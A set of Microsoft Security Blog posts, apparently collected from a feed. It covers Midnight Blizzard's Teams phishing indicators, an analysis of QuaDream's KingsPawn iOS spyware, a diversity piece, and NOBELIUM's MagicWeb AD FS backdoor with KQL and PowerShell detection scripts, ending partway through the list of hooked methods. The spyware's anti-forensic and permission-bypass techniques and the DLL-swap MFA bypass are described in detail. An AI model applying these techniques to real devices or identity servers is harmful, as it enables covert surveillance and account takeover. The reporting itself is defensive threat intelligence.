• Educate users about social engineering and credential phishing attacks, including refraining from entering MFA codes sent via any form of unsolicited messages.
  • Educate Microsoft Teams users to verify ‘External’ tagging on communication attempts from external entities, be cautious about what they share, and never share their account information or authorize sign-in requests over chat.
  • Educate Microsoft Teams users about accepting or blocking people outside the organization who send messages in Microsoft Teams.
• Educate users to review sign-in activity and mark suspicious sign-in attempts as “This wasn’t me”.
• Implement Conditional Access App Control in Microsoft Defender for Cloud Apps for users connecting from unmanaged devices.

Indicators of compromise

Hunting guidance

Microsoft Purview

Customers hunting for related activity in their environment can identify users that were targeted with the phishing lure using content search in Microsoft Purview. A content search can be created for selected Exchange mailboxes (which include Teams messages) using the following keywords (remove the [] around the “.” before use): 

• mlcrosoftaccounts.onmicrosoft[.]com
• msftonlineservices.onmicrosoft[.]com
• msonlineteam.onmicrosoft[.]com
• msftservice.onmicrosoft[.]com
• noreplyteam.onmicrosoft[.]com
• accounteam.onmicrosoft[.]com
• teamsprotection.onmicrosoft[.]com
• identityverification.onmicrosoft[.]com
• msftprotection.onmicrosoft[.]com
• accountsverification.onmicrosoft[.]com
• azuresecuritycenter.onmicrosoft[.]com
• We detected a recent change to your preferred Multi-Factor Authentication (MFA)

The search results will include the messages that match the criteria. The first result will appear to be from <threadid>@unq.gbl.spaces addressed to the target user and the threat actor (i.e., the request to chat as described in Step 1), followed by the message sent by the threat actor, as shown in the Microsoft Purview image below:

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with “TI map”) to automatically match indicators associated with Midnight Blizzard in Microsoft Defender Threat Intelligence with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the Defender Threat Intelligence connector and analytics rule deployed in their Sentinel workspace. Learn more about the Content Hub.

Microsoft Sentinel also has a range of detection and threat hunting content that customers can use to detect activity related to the activity described in this blog:

• Azure portal sign-in from another Azure tenant
• Successful sign-in from non-compliant device
• User accounts – Sign-in failure due to CA spikes
• New onmicrosoft domain added to tenant

Further reading

Read about the threat actor Midnight Blizzard (formerly tracked as NOBELIUM).

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on Twitter at https://twitter.com/MsftSecIntel.

The post Midnight Blizzard conducts targeted social engineering over Microsoft Teams appeared first on Microsoft Security Blog.

April 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. DEV-0196 is now tracked as Carmine Tsunami.

To learn more about this evolution, how the new taxonomy represents the origin, unique traits, and impact of threat actors, and a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.

Microsoft Threat Intelligence analysts assess with high confidence that a threat group tracked by Microsoft as DEV-0196 is linked to an Israel-based private sector offensive actor (PSOA) known as QuaDream. QuaDream reportedly sells a platform they call REIGN to governments for law enforcement purposes. REIGN is a suite of exploits, malware, and infrastructure designed to exfiltrate data from mobile devices.  

In this blog, Microsoft analyzes DEV-0196, discusses technical details of the actor’s iOS malware, which we call KingsPawn, and shares both host and network indicators of compromise that can be used to aid in detection.

Over the course of our investigation into DEV-0196, Microsoft collaborated with multiple partners. One of those partners, Citizen Lab of the University of Toronto’s Munk School, identified at least five civil society victims of the DEV-0196 malware that included journalists, political opposition figures, and a non-government organisation (NGO) worker, in North America, Central Asia, Southeast Asia, Europe, and the Middle East. Furthermore, Citizen Lab was able to identify operator locations for QuaDream systems in the following countries: Bulgaria, Czechia, Hungary, Ghana, Israel, Mexico, Romania, Singapore, United Arab Emirates, and Uzbekistan. Read the Citizen Lab report here.

Microsoft is sharing information about DEV-0196 with our customers, industry partners, and the public to improve collective knowledge of how PSOAs operate and raise awareness about how PSOAs facilitate the targeting and exploitation of civil society. For more info, read Standing up for democratic values and protecting stability of cyberspace.

DEV-0196: A private-sector offensive actor based in Israel

PSOAs, which Microsoft also refers to as cyber mercenaries, sell hacking tools or services through a variety of business models, including access as a service. In access as a service, the actor sells full end-to-end hacking tools that can be used by the purchaser in cyber operations. The PSOA itself is not involved in any targeting or running of the operations.

Microsoft Threat Intelligence analysts assess with high confidence that DEV-0196 uses this model, selling exploitation services and malware to governments. It’s not directly involved in targeting. Microsoft also assesses with high confidence that DEV-0196 is linked to an Israel-based private company called QuaDream. According to the Israeli Corporations Authority, QuaDream, under the Israeli name קוודרים בע”מ, was incorporated in August 2016. The company has no website, and there is little public reporting about the company, with a few notable exceptions.

QuaDream came to international attention in a 2022 Reuters report, which cited a company brochure that described the REIGN platform and a list of capabilities, the report also notably suggested that QuaDream used a zero-click iOS exploit that leveraged the same vulnerability seen in NSO Group’s ForcedEntry exploit. An earlier report by Israeli news outlet Haaretz, also citing a QuaDream brochure, revealed that QuaDream did not sell REIGN directly to customers but instead did so through a Cypriot company. Haaretz also reported that Saudi Arabia’s government was among QuaDream’s clients, as was the government of Ghana. However, Haaretz could not confirm allegations made in the Ghanian press and repeated in the Israeli press that QuaDream employees were among 14 Israeli tech workers from different companies who travelled to Accra, Ghana in 2020 to meet with the incumbent administration three months prior to the presidential election for the purposes of a special project relating to it.

QuaDream was mentioned in a December 2022 report from Meta, which reportedly took down 250 accounts associated with the company. According to the report, Meta observed QuaDream testing its ability to exploit iOS and Android mobile devices with the intent “to exfiltrate various types of data including messages, images, video and audio files, and geolocation.”

Technical investigation: DEV-0196 malware

Microsoft Threat Intelligence analysts assess with high confidence that the malware, which we call KingsPawn, is developed by DEV-0196 and therefore strongly linked to QuaDream. We assess with medium confidence that the mobile malware we associate with DEV-0196 is part of the system publicly discussed as REIGN.

The captured samples targeted iOS devices, specifically iOS 14, but there were indications that some of the code could also be used on Android devices. Since the malware sample targets iOS 14, some of the techniques used in this sample may no longer work or be relevant on newer iOS versions. However, we assess it’s highly likely that DEV-0196 will have updated their malware, targeting newer versions to account for this. Analysis of the malware revealed that it is split into multiple components. The sections below focus on two of those components: a monitor agent and the main malware agent.

Monitor agent

The monitor agent is a native Mach-O file written in Objective-C. It is responsible for reducing the forensic footprint of the malware to prevent detection and hinder investigations. It has multiple techniques to do this, one of which is monitoring various directories, such as /private/var/db/analyticsd/ and /private/var/mobile/Library/Logs/CrashReporter, for any malware execution artifacts or crash-related files. Once these artifacts or files are identified, the monitor agent deletes them.

The monitor agent is also in charge of managing the various processes and threads spawned on behalf of the malware to avoid artifacts created from unexpected process crashes. The agent uses the waitpid function to monitor all child processes that are spawned, and the child process IDs are added to a tracking list. The monitor agent attempts to safely shut down tracked child processes by calling sigaction with the SIGTSTP parameter, if sigaction returns successfully this means the child process is reachable and a SIGKILL command is sent to kill it. This avoids sending a kill command to a non-existent PID, which can leave error messages and artifacts behind.

Main agent

The main agent is also a native Mach-O file. However, it is written in Go, a highly portable language, which was likely chosen because it allows compilation across multiple platforms, reducing development effort.

This agent includes capabilities to:

• Get device information (such as iOS version and battery status)
• Wi-Fi information (such as SSID and airplane mode status)
• Cellular information (such as carrier, SIM card data, and phone number)
• Search for and retrieve files
• Use the device camera in the background
• Get device location
• Monitor phone calls
• Access the iOS keychain
• Generate an iCloud time-based one-time password (TOTP)

It achieves some of these functionalities, for example the surreptitious camera use, by leveraging two key binaries, tccd and mediaserverd, a technique described by ZecOps. The name tccd stands for Transparency, Consent, and Control (TCC) Daemon, and the process manages the access permissions for various peripherals such as the camera and microphone. Normally, users are met with a pop-up prompt from the tccd process, alerting them that something has requested access to the camera, microphone, or other peripheral, and the user is required to either allow or deny it. In this compromise scenario, the agent injects itself into the tccd binary, which allows the agent to spawn both new processes and threads as part of the exploitation process, and also allows it to bypass any tccd prompts on the device meaning the user would be unaware of camera compromise. In concert with tccd, the agent also provisions itself permission to run in the background via mediaserverd. This binary handles the interface that other apps interact with when utilizing the camera. For more details on iOS process injection, tccd and other system components, see Jonathan Levin’s macOS and iOS internals books and blog.

The techniques used in the main agent include a PMAP bypass, an Apple Mobile File Integrity (AMFI) bypass, and a sandbox escape. PMAP is one of the mechanisms that works with the Page Protection Layer (PPL) to prevent unsigned code from running on iOS devices. AMFI is a protection mechanism comprised of multiple components including a kernel extension, AppleFileMobileIntegrity.kext, as well as userland daemon, amfid. The sandbox limits access to system resources and user data via an entitlements system. Although PMAP, PPL, AMFI, and the sandbox have been hardened over the years, advanced attackers attempt to circumvent these protection mechanisms in order to run unsigned code.

The agent also creates a secure channel for XPC messaging by creating a nested app extension called fud.appex. XPC messaging allows the agent to query various system binaries for sensitive device information, such as location details. Although there is a legitimate binary called fud on iOS devices that is part of the Mobile Accessory updater service, fud.appex is not part of a legitimate Apple service. The agent creates the malicious app extension inside the folder /private/var/db/com.apple.xpc.roleaccountd.staging/PlugIns/. The primary reason for performing XPC messaging from within this application extension is to establish a covert channel that enables the agent to avoid being monitored. This nested directory technique means that the XPC service is registered such a way that it is only visible to the app extension itself, so any external monitoring by other applications and system processes is far more difficult. Upon unhooking and restoring tccd to its original state, the entire PlugIns folder is removed to further hide any artifacts of its existence.

In their blog, Citizen Lab discusses the presence of likely malicious calendar events on devices compromised by DEV-0196’s malware, so another notable function of the main agent is that it contains specific code to remove events from the device’s calendar. The agent searches all calendar events from two years prior to the current time and up to the furthest possible allowed future time, removing any events that are tied to a given email address as the “organizer”. The agent also removes the email address from the idstatuscache.plist, which is a database containing records of the first contact of the device with other iCloud accounts. This list would contain the email address that sent the malicious calendar invitation, as well as a time stamp of the original interaction, such as when the invite was received.

There is additional functionality within the agent to cover its tracks by removing artifacts of location monitoring from the locationd process’ records. To first query locations from locationd, the agent must register a client that communicates with locationd via XPC messaging. The locationd process then stores a record of these connections in /private/var/root/Library/Caches/locationd/clients.plist. The malicious agent searches for items in the client plist that have a suffix of subridged, and then removes them, which indicates that the name of their location monitoring client likely ends in that word. This is another example of malicious activity attempting to masquerade as benign system processes, since subridged is the name of a legitimate Apple binary, a part of the SoftwareUpdateBridge Framework.

Technical investigation: DEV-0196 infrastructure

Microsoft developed unique network detections that could be used to fingerprint DEV-0196’s infrastructure on the internet. The group heavily utilized domain registrars and inexpensive cloud hosting providers that accepted cryptocurrency as payment. They tended to only use a single domain per IP address and domains were very rarely reused across multiple IP addresses. Many of the observed domains were deployed using free Let’s Encrypt SSL certificates, while others used self-signed certificates designed to blend in with normal Kubernetes deployments.

We have included network-based indicators at the end of this post for detection purposes. Often, threat actors employ domains that carry country-specific TLDs or themes that align with the location of intended targets. Notably, our list of DEV-0196 domains includes domains strongly associated with some countries that Citizen Lab has identified as locations of victims, countries where QuaDream platforms were operating, or both. To be clear, the identification of victims of the malware in a country doesn’t necessarily mean that an entity in that country is a DEV-0196 customer, as international targeting is common.

Prevention and detection

Preventing exploitation of mobile devices by advanced actors who potentially have zero-click exploits is difficult. There are also significant challenges in detecting an attack on mobile devices, both during and after the compromise. This section discusses some methods for minimizing the risk of malicious actors compromising mobile devices, and then provides some indicators of compromise we associate with DEV-0196 activity.

Basic cyber hygiene is important in helping prevent mobile device compromise. Specific best practices include keeping the device’s software updated to the latest version, enabling automatic software updates if available, using anti-malware software, and being vigilant about not clicking links in any unexpected or suspicious messages.

If you believe you may be targeted by advanced attackers and use an iOS device, we recommend enabling Lockdown Mode. Lockdown Mode offers enhanced security for iOS devices by reducing the attack surface available to threat actors.

Sentinel detections

Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

In addition, customers can access the shared indicators in a structured format via GitHub so that they can be integrated into custom analytics and other queries: https://github.com/microsoft/mstic/blob/master/RapidReleaseTI/Indicators.csv.

Indicators of compromise (IOCs)

Host-based indicators

These host-based indicators are indicative of DEV-0196 activity; however, they shouldn’t be used solely as attribution since other actors may also use the same or similar TTPs.

The file existing, or process activity from, /private/var/db/com.apple.xpc.roleaccountd.staging/subridged

The file existing, or process activity from, com.apple.avcapture

The folder /private/var/db/com.apple.xpc.roleaccountd.staging/PlugIns/fud.appex/ existing, or having activity detected from the folder.

Network indicators

Based on the results of our C2 investigation, Microsoft Threat Intelligence associate the following domains with DEV-0196 activity. The dates the domains were first detected as likely in use is given, along with the last seen active date.

The post DEV-0196: QuaDream’s “KingsPawn” malware used to target civil society in Europe, North America, the Middle East, and Southeast Asia appeared first on Microsoft Security Blog.

Women are vital to the industry and have played—and will continue to play—a key role in advancing technology and cybersecurity. I’ve been honored to meet and learn from incredible women doing amazing work in the areas of threat intelligence, policy and privacy, security and AI, and more. Yet, as we’ve shared before, women represent a mere 25 percent of the cybersecurity workforce. In an International Women’s Day Microsoft survey, we uncovered the reasons for this to be because of stereotyping of women and gender bias, not enough female mentors and role models in cybersecurity, insufficient training and education opportunities, and uncertainty about cybersecurity career pathways.³

This is concerning, considering that women provide strong skills perfect for cybersecurity such as diverse points of view, deep analytic and risk assessment skills, along with emotional intelligence. While the industry has made enormous strides, there is still work to be done. Together, academia, the tech industry, and government agencies are working on programs and new technologies to overcome these challenges, while encouraging more girls to envision cybersecurity careers.  

“Security is not just processes and policies, but there’s also the care work that comes into talking to people and understanding their issues. It helped me bring other people in our organization up to a place where you make it easier for women, specifically in security, to exist.”

—Abir Ghattas, Director of Information Security, Human Rights Watch

Internal career development, community, and sponsorship for women in cybersecurity

Each of us can do our part in supporting women in cybersecurity in our own way. At Microsoft, building a stronger future for women in cybersecurity begins with a strong foundation here at our Microsoft home. All women within Microsoft Security deserve the resources necessary to feel connected, thriving, and empowered to achieve more. Microsoft has been focusing on building a strong community internally to make this a reality. This initiative includes:

• Creating an Employee Resource Group for women within Microsoft Security that aims to create supportive allyship and an inclusive culture for women at the company.
• Offering safe forums, mentorship programs, and learning opportunities to support personal and professional development.
• Encouraging the growth of women as leaders within Microsoft Security by ensuring they have advocates and leadership team sponsors.

These efforts already have led to impressive progress, as the industry is already recognizing several Microsoft Security women in their fields, such as Kate Maxwell, Senior Director of Defense and Intelligence, considered one of the 100 Women in Tech Leaders to Watch in 2023 by Women Tech Network,⁴ and Edna Conway, Vice President of Security, Risk, and Compliance, chosen the 2021 Executive of the Year by the Executive Women’s Forum.⁵

Fanta Orr, Intelligence Analysis Director at Microsoft, says that curiosity is one of the factors that make someone successful in the industry. “People who take initiative to solve problems and drive investigations do well. Also, if you’ve been a woman in this field for any amount of time, it means you’ve got grit and wit. On top of that, women are generally great at systems thinking, which is vital both in the policy and technical defense aspects of cybersecurity,” she says.

Partnering with external organizations and initiatives to enable and empower diversity

We care about the entire industry and the promise of the next generation. With our solid foundation of support for female professionals at Microsoft, we are in a stronger position to give back to the community by supporting, coaching, and mentoring women in cybersecurity. We do this by partnering with organizations and projects that practice similar values and focus on diversity for cybersecurity education. The following are a few of the organizations we support by providing resources, mentors, and education:

• Women in Cybersecurity (WiCyS) program aims to increase the number of women in cybersecurity roles by providing mentorship, networking opportunities, and access to training and resources. Established in 2012, this global community with more than 7,000 members in more than 70 countries creates opportunities for women in cybersecurity through professional development programs, conferences, student chapters, and career fairs. WiCyS gives women the confidence and support they need to continue their path in cybersecurity as Aimee Reyes, Microsoft Last Mile Cybersecurity Scholarship recipient and former WiCyS Student Chapter president, has said “For anyone who thinks that cybersecurity is a male profession, I would say you’re going to see a lot of men. It doesn’t mean you can’t make your own table, make your own seat. It doesn’t mean that you don’t belong, because you do.”

• Girl Security Partnership provides training and resources to girls and young women to help them explore careers in cybersecurity and gain the skills they need to succeed in the field. Since its inception, Girl Security’s mentorship program has served almost 1,000 mentees and aims to drive change in national security through education, mentoring, and workforce training.

• DigiGirlz gives middle and high school girls opportunities to learn about careers in technology and connect with Microsoft employees. The DigiGirlz program gives high school girls the chance to participate in hands-on computer and technology workshops and learn about careers in technology. More than 65,000 students have attended the Microsoft DigiGirlz Technology Program since its inception in 2000.

• Executive Women’s Forum: Woman-founded in 2002, the Executive Women’s Forum (EWF) is fiercely devoted to engaging, developing, and advancing all women in the information security, IT risk management, and privacy industries, through education, leadership development and the creation of trusted relationships. A powerful community and caring sisterhood, the EWF focuses on building women leaders at every stage of their career.

• Cybersecurity education global expansion: Microsoft is also partnering with diverse worldwide organizations to equip educators, students, and professionals to empower women and minorities in cybersecurity. Programs developed with non-governmental organizations such as CyberShikshaa in India and WOMCY in Latin America have been providing mentorship, courses, certifications, and resources to women from all backgrounds to pursue careers in cybersecurity. This enables women early in their careers to explore the possibilities just like Eva Nassery, a mentee from the Microsoft-supported CyberSchool program in France, did. “I never imagined that I could take a path, a career in cybersecurity. But I decided to change my career and when I started to look for training, I discovered that cybersecurity gives huge work opportunities. That’s when I noticed I could do it myself, too,” Eva says.

Thriving together as we nurture the next generation of cyber defenders

If we want to thrive as an industry, we must become allies and advocate for each other every chance we get. I am grateful that we have this opportunity during Women’s History Month to lift each other up and that I get to share with you some of the stories from women with whom I have had the pleasure of working over the past years. However, it doesn’t just end after March, as learning about others’ perspectives and transferring your privileges to support each other whether at work, in an interview, or a public place is the essence of being an actionable ally. Allyship is truly a journey as we support and nurture women at every stage of their career. And this means not only mentoring or coaching other women, but also becoming strong advocates when they may not have a strong voice or be at the table to share their perspective. It means being inclusive and welcoming women into your meetings, decision making, events, and recognition. We know that when we do this we will thrive and grow as a community of cyber defenders.

Please join me along with many other women leaders in cybersecurity at our  marquee event Microsoft Secure on March 28, 2023, where we will talk about what we are doing to ready the security workforce and how we can inspire the next generation of cybersecurity professionals. We’ll  talk about how Microsoft defends itself and its customers, the challenges security teams face daily, and the future of security innovation. Register now.

If you’re interested in learning more about the many opportunities and next steps in cybersecurity, please join us on March 15, 2023, for a podcast called Secure the Job: Breaking into Cybersecurity, hosted by three young cybersecurity professionals at Microsoft. They will interview executives, leaders in cybersecurity, and frontline defenders to understand more about the cybersecurity landscape, roles, pathways, and skills needed to be successful.

Also, check out our website for volunteer opportunities with some of the incredible organizations we partner with. Whether you are a student or already a cybersecurity professional, you can find educational resources and career pathways on this web page along with mentoring opportunities. Together, we can inspire and support each other to build the next generation of women cyber defenders.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and Twitter (@MSFTSecurity) for the latest news and updates on cybersecurity.

¹Pioneering Women in Cryptology, Lou Leto and Jen Wilcox. March 29, 2018.

²10 pioneering women in information security, Deb Radcliff. March 30, 2021.

³Results based on March 2022 IWD Survey commissioned by Microsoft in partnership with WE Communications.

⁴100 Women in Tech Leaders to Watch in 2022, Women Tech Network.

⁵The Executive Women’s Forum Announces the 2021 Recipients of the EWF Women of Influence Awards and E, EWF. October 26, 2021.

The post International Women’s Day: The power of diversity to build stronger cybersecurity teams appeared first on Microsoft Security Blog.

April 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned around the theme of weather. NOBELIUM is now tracked as Midnight Blizzard.

To learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a complete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming taxonomy.

The Microsoft Detection and Response Team (DART) has been renamed to Microsoft Incident Response (Microsoft IR). For more information on IR services, go to Microsoft Incident Response

August 26, 2022 update: Added instructions to enable collection of AD FS event logs in order to search for Event ID 501, and added a new resource for AD FS audit logging in Microsoft Sentinel.

Microsoft security researchers have discovered a post-compromise capability we’re calling MagicWeb, which is used by a threat actor we track as NOBELIUM to maintain persistent access to compromised environments. NOBELIUM remains highly active, executing multiple campaigns in parallel targeting government organizations, non-governmental organizations (NGOs), intergovernmental organizations (IGOs), and think tanks across the US, Europe, and Central Asia. The Microsoft Threat Intelligence Center (MSTIC) assesses that MagicWeb was likely deployed during an ongoing compromise and was leveraged by NOBELIUM possibly to maintain access during strategic remediation steps that could preempt eviction.

NOBELIUM has used abuse of identities and credentialed access as a method for maintaining persistence, and a specialized capability like MagicWeb is not novel for the actor: in September 2021, Microsoft disclosed a post-exploitation capability named FoggyWeb with methods and intent similar to MagicWeb. FoggyWeb was capable of exfiltrating the configuration database of compromised AD FS servers, decrypting token-signing certificates and token-decryption certificates, and downloading and executing additional malware components. MagicWeb goes beyond the collection capabilities of FoggyWeb by facilitating covert access directly. MagicWeb is a malicious DLL that allows manipulation of the claims passed in tokens generated by an Active Directory Federated Services (AD FS) server. It manipulates the user authentication certificates used for authentication, not the signing certificates used in attacks like Golden SAML.

NOBELIUM was able to deploy MagicWeb by first gaining access to highly privileged credentials and moving laterally to gain administrative privileges to an AD FS system. This is not a supply chain attack. The attacker had admin access to the AD FS system and replaced a legitimate DLL with their own malicious DLL, causing malware to be loaded by AD FS instead of the legitimate binary. The backdoor was discovered by Microsoft’s Detection and Response Team (DART) in coordination with MSTIC and Microsoft 365 Defender Research during an ongoing incident response investigation. Microsoft is sharing this information with consent from the client. At the time of this investigation, MagicWeb appears to be highly targeted.

Like domain controllers, AD FS servers can authenticate users and should therefore be treated with the same high level of security. Customers can defend against MagicWeb and other backdoors by implementing a holistic security strategy including the AD FS hardening guidance. In the case of this specific discovery, MagicWeb is one step of a much larger intrusion chain that presents unique detection and prevention scenarios.

With all critical infrastructure such as AD FS, it is important to ensure attackers do not gain administrative access. Once attackers gain administrative access, they have many options for further system compromise, activity obfuscation, and persistence. We recommend that any such infrastructure is isolated, accessible only by dedicated admin accounts, and regularly monitored for any changes. Other security measures that can prevent this and other attacks include credential hygiene to prevent lateral movement. AD FS is an on-premises server, and as with all on-premises servers, deployments can get out of date and/or go unpatched, and they can be impacted by local environment compromises and lateral movement. For these reasons, migration to a cloud-based identity solution such as Azure Active Directory for federated authentication is recommended for the robust security it provides. See the mitigation section below for more information. Though we assess the capability to be in limited use, Microsoft anticipates that other actors could adopt similar methodologies and therefore recommends customers review hardening and mitigation guidance provided in this blog.

How MagicWeb subverts authentication

MagicWeb is a post-compromise malware that can only be deployed by a threat actor after gaining highly privileged access to an environment and moving laterally to an AD FS server. To achieve their goal of maintaining persistent access to an environment by validating authentication for any user account on the AD FS server, NOBELIUM created a backdoored DLL by copying the legitimate Microsoft.IdentityServer.Diagnostics.dll file used in AD FS operations. The legitimate version of this file is catalog signed by Microsoft and is normally loaded by the AD FS server at startup to provide debugging capabilities. NOBELIUM’s backdoored version of the file is unsigned. The threat actor’s highly privileged access that allowed them to access the AD FS server meant they could have performed any number of actions in the environment, but they specifically chose to target an AD FS server to facilitate their goals of persistence and information theft during their operations.

After gaining administrative access to an AD FS server via elevation of privilege and lateral movement, the loading of NOBELIUM’s malicious Microsoft.IdentityServer.Diagnostics.dll into the AD FS process is possible by editing C:\Windows\AD FS\Microsoft.IdentityServer.Servicehost.exe.config to specify a different public token, which controls what loads into the AD FS process when it is started. Because AD FS is a .NET application, it loads the DLLs specified in the config file from the Global Assembly Cache (GAC). By changing the token in the configuration, the adversary directed AD FS to load in the malicious DLL. The interception and manipulation of claims by MagicWeb enables the actor to generate tokens that allow the adversary to bypass AD FS policies (role policies, device policies, and network policies) and sign in as any user with any claims, including multifactor authentication (MFA).

To understand how NOBELIUM can subvert the AD FS process with the MagicWeb malware, it’s important to understand how AD FS claims work. AD FS extends the ability to use single sign-on functionality available within a single security or enterprise boundary to internet-facing applications to provide customers, partners, and suppliers a streamlined user experience while accessing an organization’s web-based applications. AD FS relies on claims-based authentication to validate the identity of the user and their authorization claims. These claims are packaged into a token that can be used for authentication. MagicWeb injects itself into the claims process to perform malicious actions outside the normal roles of an AD FS server.

Security Assertion Markup Language (SAML) uses x509 certificates to establish trust relationships between identity providers and services and to sign and decrypt tokens. These x509 certificates contain enhanced key usage (EKU) values that specify what applications the certificate should be used for. For instance, an EKU containing an Object Identifier (OID) value of 1.3.6.1.4.1.311.20.2.2 would allow for the use of a SmartCard logon. Organizations can create custom OIDs to further narrow certificate usage.

MagicWeb’s authentication bypass comes from passing a non-standard Enhanced Key Usage OID that is hardcoded in the MagicWeb malware during an authentication request for a specified User Principal Name. When this unique hard coded OID value is encountered, MagicWeb will cause the authentication request to bypass all standard AD FS processes (including checks for MFA) and validate the user’s claims. MagicWeb is manipulating the user authentication certificates used in SAML sign-ins, not the signing certificates for a SAML claim used in attacks like Golden SAML.

NOBELIUM uses unique tradecraft per target, so it’s highly likely that the OIDs and public tokens are unique per target as well. We’ve redacted these OIDs and tokens in this report. Please see the hunting guidance section for information on how to look for variants related to this attack.

How to mitigate this threat

NOBELIUM’s ability to deploy MagicWeb hinged on having access to highly privileged credentials that had administrative access to the AD FS servers, giving them the ability to perform whatever malicious activities they wanted to on the systems they had access to.

It’s critical to treat your AD FS servers as a Tier 0 asset, protecting them with the same protections you would apply to a domain controller or other critical security infrastructure. AD FS servers provide authentication to configured relying parties, so an attacker who gains administrative access to an AD FS server can achieve total control of authentication to configured relying parties (include Azure AD tenants configured to use the AD FS server). Practicing credential hygiene is critical for protecting and preventing the exposure of highly privileged administrator accounts. This especially applies on more easily compromised systems like workstations with controls like logon restrictions and preventing lateral movement to these systems with controls like the Windows Firewall.

Migration to Azure Active Directory (Azure AD) authentication is recommended to reduce the risk of on-premises compromises moving laterally to your authentication servers. Customers can use the following references on migration:

• Use the activity report to move AD FS apps to Azure AD
• Move application authentication to Azure AD

Advanced hunting queries

Recommended hunting guidance

• Have Inventory Certificate Issuance policies in your Public Key Infrastructure (PKI) environment, including all EKU attributes used in the environment and compare to known OID values.
• Hunt across Windows Event Logs by enabling AD FS verbose logging. Enable security auditing to allow collection of the AD FS event logs, and specifically look for Event ID 501. This event specifies all the EKU attributes on a claim. Hunt across these logs to look for EKU values which your PKI infrastructure isn’t configured to issue.
• Look for portable executable files in the GAC or AD FS directories on your systems that aren’t signed by Microsoft and inspect these files or submit them for analysis.
• Perform an audit of your exclusion settings to be sure that the AD FS and GAC are included in scans. Many organizations exclude the AD FS directories from security software scanning because of performance degradation concerns.

Microsoft Sentinel

Microsoft Sentinel customers who have enabled verbose mode logging for ADFS can use this query to look for suspicious OIDs: https://github.com/Azure/Azure-Sentinel/tree/master/Detections/SecurityEvent/ADFSAbnormalEnhancedKeyUsageAttribute-OID.yaml.

NOTE: It’s important to enable the proper connector in Sentinel with the correct Event collection. Refer to this post for more details on AD FS Audit logging collection in Sentinel.

Searching for unsigned files in the GAC

The legitimate Microsoft.IdentityServer.Diagnostics.dll is catalog signed by Microsoft. Catalog signing is a method Windows uses for validating code integrity different from Authenticode, and is used for offline validation rather than runtime enforcement of running only signed code. The catalog signing on this file means the file may appear to be unsigned on the file properties pane and in file integrity checkers, security tools, and online malware repositories. The scripts below allow you to look for unsigned binaries and understand both catalog-signed binaries and Authenticode-signed binaries.

Surface unsigned DLLs in GAC using Microsoft 365 Defender

This query surfaces unsigned DLLs in the GAC folder created within the last 60 days.

DeviceImageLoadEvents

     | where FolderPath has @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer." and FileName endswith ".dll" and not(isempty(SHA1))

     | join kind = leftanti (DeviceFileCertificateInfo) on SHA1

     | distinct DeviceName, FolderPath, FileName, SHA1, SHA256

Enumerate non-Microsoft signed DLLs in the GAC using PowerShell

Below is an example script that could be used to enumerate non-Microsoft signed DLLs in the relevant GAC folder, where servers.txt is a list of servers you wish to scan. Because the legitimate Microsoft.IdentityServer.Diagnostics.dll is catalog signed, signing won’t appear when viewing file properties, but it will show in PowerShell querying and on load of the DLL.

$servers = get-content -Path (path to file)\servers.txt 
Foreach ($server in $servers) { 
Write-Output "Processing server: $server" 
Invoke-Command -ComputerName $server {Get-ChildItem -Filter "*.dll" -Recurse "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\" | get-authenticodesignature | ft} 
}

Detections

Microsoft Defender Antivirus

Microsoft Defender Antivirus provides detection for this threat under the following malware name:

• Trojan:MSIL/MagicWeb.A!dha

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint customers may see the following alert as an indication of possible attack:

• ADFS persistent backdoor detected

Indicators of compromise (IOCs)

Microsoft isn’t sharing IOCs on this NOBELIUM activity at this time. However, NOBELIUM frequently customizes infrastructure and capabilities per campaign, minimizing operational risk should their campaign specific attributes be discovered. If MagicWeb is identified in your environment, it’s unlikely to match any static IOCs from other targets such as a SHA-256 value. It’s recommended to use the hunting guidance provided above to investigate your environment.

Technical analysis of MagicWeb

NOBELIUM has modified the legitimate Microsoft.IdentityServer.Diagnostics.dll by adding malicious code to the TraceLog class from the Microsoft.IdentityServer.Diagnostics namespace/type.

The header section of the TraceLog class from the legitimate Microsoft.IdentityServer.Diagnostics.dll is shown below:

Meanwhile, the header section of the TraceLog class from NOBELIUM’s backdooredversion of Microsoft.IdentityServer.Diagnostics.dll is shown below:

In the backdoored version of the code, as shown above, NOBELIUM has added a static constructor for the TraceLog class. A static constructor is used to initialize any static data, or to perform a particular action that needs to be performed only once. It’s called automatically before the first instance is created or any static members are referenced.

The malicious static constructor gets executed once before the first instance of the TraceLog class is created. Given that new instances of the TraceLog class is created in various locations in this DLL, the execution of the malicious static constructor is guaranteed to occur as soon as the DLL is loaded for the first time (which would be upon startup of the AD FS server after the malicious changes to Microsoft.IdentityServer.Servicehost.exe.config described above).

NOBELIUM’s malicious static constructor contains a reference to the Initialize() method from a class named AuthLog.

The AuthLog class is a brand-new and malicious class that’s been added to the DLL by NOBELIUM.

As shown above, the Initialize() method references a class named RuntimeHelper, yet another class added to the DLL by the actor. The primary purpose of the RuntimeHelper class and its OverloadMethod() method is to hook legitimate AD FS related methods at runtime. By hooking the legitimate AD FS methods, the backdoor is capable of intercepting calls to the legitimate methods to instead invoke its own custom methods.

The screenshot above shows the following legitimate AD FS methods being hooked by MagicWeb:

Hook method: BeginBuild()

